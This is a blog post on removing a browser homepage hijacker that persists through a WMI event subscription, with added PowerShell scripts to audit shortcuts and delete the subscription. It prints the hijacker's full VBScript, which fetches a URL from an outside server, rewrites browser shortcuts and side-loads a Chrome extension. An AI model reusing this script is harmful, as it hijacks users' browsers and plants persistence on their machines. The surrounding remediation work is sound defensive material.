A fix for a hijacked browser homepage

Author: Yihulee | Source: published 2017-03-07 19:24, read 1082 times

Original source: http://www.iefans.net/ie-zhuye-jiechi-www-2345-com-kunown

The browser homepage gets hijacked

Recently I carelessly ran a piece of junkware, which very thoughtfully installed a full antivirus suite and a browser bundle for me. Those were bearable, since I could uninstall them cleanly myself; the one thing I could not tolerate was that it hijacked the homepage of every browser on my machine. As soon as a browser opens, it first jumps to a designated site, http://qtipr.com/, exactly like the old redirections to hao123.com.

I took a close look at the shortcut and found it had already been tampered with:

[Image: the tampered shortcut]

Even if you remove the URL circled in the image above, that only holds for a moment; before long it is back to how it was. Clearly the junkware has set up something like a timer on the machine that rewrites the shortcuts every few minutes, which is truly obnoxious.

Later I used a tool to check which program was actually modifying the shortcuts, and found it was scrcons.exe. I looked it up, and there really is a documented way to deal with this kind of hijack.

First, download a tool: WMI Tools.

After installing it, open WMI Event Viewer and click Register for events in the top-left corner. In the Connect to namespace dialog that pops up, enter "root\subscription" and confirm. You get the following:

In the left pane click __EventFilter:Name="unown_filter", then in the right pane right-click ActiveScriptEventConsumer Name="unown" and choose View instance properties, as shown below:

I am attaching the script it contained; it looks roughly like this:

```vbscript
' The hijacker's ActiveScriptEventConsumer script, as found in root\subscription.
' The original is a single line with ":" statement separators; it is split into
' lines here for readability, with the behaviour left exactly as found.

' 1. Fetch the homepage URL to inject from the operator's server.
Dim xmlHttp
Dim homePageUrl
Set xmlHttp = CreateObject("MSXML2.XMLHTTP")
xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?" & Timer(), False
On Error Resume Next
xmlHttp.send
If xmlHttp.status = 200 Then
    homePageUrl = xmlHttp.responseText
End If

Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next

' 2. Arguments to write into each shortcut: plain URL for most browsers,
'    URL plus a side-loaded extension for Chromium-based ones.
link = homePageUrl
linkChrome = " --load-extension=""C:\Users\Yihulee\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"" " + homePageUrl

browsers = Array("IEXPLORE.EXE", "firefox.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe", "chrome.exe", "360chrome.exe")
ChromeBrowsers = Array("chrome.exe", "360chrome.exe")

Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
    BrowserDic.Add LCase(browser), browser
Next
Set ChromeBrowserDic = CreateObject("scripting.dictionary")
For Each ChromeBrowser In ChromeBrowsers
    ChromeBrowserDic.Add LCase(ChromeBrowser), ChromeBrowsers
Next

' 3. Every folder where browser shortcuts normally live (paths hard-coded
'    for this machine's user profile).
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\Yihulee\Desktop"
FoldersDic(5) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\Yihulee\AppData\Roaming"
FoldersDic(9) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\Yihulee\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"

' 4. Rewrite the Arguments of every .lnk whose target is a known browser,
'    clearing the read-only attribute first so the save cannot fail.
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
    For Each file In fso.GetFolder(FoldersDic(i)).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If BrowserDic.Exists(LCase(name)) Then
                If ChromeBrowserDic.Exists(LCase(name)) Then
                    oShellLink.Arguments = linkChrome
                Else
                    oShellLink.Arguments = link
                End If
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
Next

' 5. Kill the WMI script host that ran this consumer, so it does not linger.
CreateObject("Wscript.Shell").Run "cmd /c taskkill /f /im scrcons.exe", 0
```

As you can see, almost every browser is on the list: IEXPLORE.EXE, chrome.exe, firefox.exe, 360chrome.exe, 360SE.exe, SogouExplorer.exe, opera.exe, Safari.exe, Maxthon.exe, TTraveler.exe, TheWorld.exe, baidubrowser.exe, liebao.exe, QQBrowser.exe. The folders where shortcuts live, such as C:\Users\Public\Desktop, are all spelled out too. One look at this code tells you it is up to no good.
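The script above works by scanning a fixed list of shortcut folders and overwriting the Arguments field of every .lnk whose target is a known browser. The following PowerShell script is an added example, not code from the original post: it scans the same folders (using the current user's profile variables instead of the hard-coded "Yihulee" paths), reports any browser shortcut whose Arguments contain a URL or a --load-extension switch, and, with -Fix, clears those arguments. The browser list is the one the hijacker script uses; the function name Find-HijackedShortcut is my own.

```powershell
# Added example (not from the original post): audit and clean browser shortcuts
# whose Arguments were rewritten by the hijacker. Run in Windows PowerShell.

$browsers = 'iexplore.exe','firefox.exe','360se.exe','sogouexplorer.exe','opera.exe','safari.exe',
            'maxthon.exe','ttraveler.exe','theworld.exe','baidubrowser.exe','liebao.exe',
            'qqbrowser.exe','chrome.exe','360chrome.exe'

# Same folders the hijacker script targets, expressed via profile variables.
$folders = @(
    "$env:PUBLIC\Desktop",
    "$env:ProgramData\Microsoft\Windows\Start Menu",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:USERPROFILE\Desktop",
    "$env:APPDATA\Microsoft\Windows\Start Menu",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:APPDATA",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
)

function Find-HijackedShortcut {
    param([switch]$Fix)   # without -Fix the function only reports
    $shell = New-Object -ComObject WScript.Shell
    foreach ($folder in $folders) {
        if (-not (Test-Path -LiteralPath $folder)) { continue }
        foreach ($lnk in Get-ChildItem -LiteralPath $folder -Filter *.lnk -File -Force) {
            $sc = $shell.CreateShortcut($lnk.FullName)
            $target = [IO.Path]::GetFileName($sc.TargetPath).ToLower()
            if ($browsers -notcontains $target) { continue }
            # A clean browser shortcut normally has empty Arguments; a URL or an
            # injected --load-extension switch is the hijack signature.
            if ($sc.Arguments -match 'https?://|--load-extension') {
                [pscustomobject]@{ Shortcut = $lnk.FullName; Target = $target; Arguments = $sc.Arguments }
                if ($Fix) {
                    # The hijacker clears read-only before saving; do the same so Save() succeeds.
                    if (($lnk.Attributes -band [IO.FileAttributes]::ReadOnly) -ne 0) {
                        $lnk.Attributes = $lnk.Attributes -bxor [IO.FileAttributes]::ReadOnly
                    }
                    $sc.Arguments = ''
                    $sc.Save()
                }
            }
        }
    }
}

# Report only:
Find-HijackedShortcut | Format-Table -AutoSize
# Clean up only after the WMI subscription that rewrites them is gone,
# otherwise the arguments come straight back:
# Find-HijackedShortcut -Fix
```

Running the report before and after removing the WMI subscription is a cheap way to confirm the rewrite loop has actually stopped: if the list is empty after -Fix and stays empty a few minutes later, nothing is restoring the URL.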

Finally, the removal: in WMI Event Viewer, right-click the __EventFilter:Name="unown_filter" item and delete it. Can't delete it? Go to the WMI Tools install path (for example C:\Program Files (x86)\WMI Tools), right-click wbemeventviewer.exe, choose Run as administrator, and delete it from there! Still not done: you also have to manually remove that URL from each browser shortcut in the Quick Launch bar. That's all for now; if there turn out to be other lingering effects, we'll see as we go.
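The GUI steps above delete one entry of a permanent WMI event subscription. Such a subscription is three objects in root\subscription: an __EventFilter (the trigger, here a timer-style query), an event consumer (here an ActiveScriptEventConsumer, whose script runs inside scrcons.exe, the WMI scripting host the post caught modifying the shortcuts), and a __FilterToConsumerBinding that ties them together. The PowerShell below is an added example, not part of the original post: it lists all three object types so nothing is deleted blind, prints the script text of every ActiveScriptEventConsumer with a simple keyword flag, and removes a named filter/consumer pair plus its binding. The names unown_filter and unown are the ones reported in the post; on another machine they will differ. Run it from an elevated prompt.

```powershell
# Added example (not from the original post): enumerate and remove persistent
# WMI event subscriptions in root\subscription. Run as administrator.

$ns = 'root\subscription'

function Get-WmiPersistence {
    # Return every filter, consumer and binding for review.
    [pscustomobject]@{
        Filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
        Consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)
        Bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)
    }
}

function Show-ScriptConsumers {
    # ActiveScriptEventConsumer runs arbitrary VBScript/JScript in scrcons.exe;
    # it is the class abused here, so dump its script body for inspection.
    # The keyword list is a constructed heuristic, not a signature.
    Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer | ForEach-Object {
        $flag = if ($_.ScriptText -match 'CreateShortcut|XMLHTTP|taskkill') { 'SUSPICIOUS' } else { 'review' }
        "[{0}] {1} ({2})" -f $flag, $_.Name, $_.ScriptingEngine
        $_.ScriptText
        '-' * 60
    }
}

function Remove-WmiSubscription {
    param(
        [Parameter(Mandatory)][string]$FilterName,
        [Parameter(Mandatory)][string]$ConsumerName
    )
    # Delete the binding first so the consumer can no longer fire, then the
    # consumer and the filter. Binding properties hold object paths such as
    # __EventFilter.Name="unown_filter", so match on the embedded name.
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -match "Name=`"$FilterName`"" -and $_.Consumer -match "Name=`"$ConsumerName`"" } |
        Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventConsumer | Where-Object { $_.Name -eq $ConsumerName } | Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventFilter   | Where-Object { $_.Name -eq $FilterName }   | Remove-WmiObject
}

# 1. Inventory: on a clean workstation this is usually empty or near-empty.
$state = Get-WmiPersistence
$state.Filters  | Format-Table Name, Query -AutoSize
$state.Bindings | Format-Table Filter, Consumer -AutoSize
Show-ScriptConsumers

# 2. After confirming the names from the output above:
# Remove-WmiSubscription -FilterName 'unown_filter' -ConsumerName 'unown'
```

Deleting the filter alone, as the GUI steps do, is enough to stop the script from firing, but leaving an orphaned consumer and binding behind makes a later audit confusing; removing all three is the cleaner end state. Because the script consumer is what rewrites the shortcuts, remove the subscription first and only then clean the shortcuts, or they will be rewritten within minutes.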


Article link: https://www.haomeiwen.com/subject/mxfvgttx.html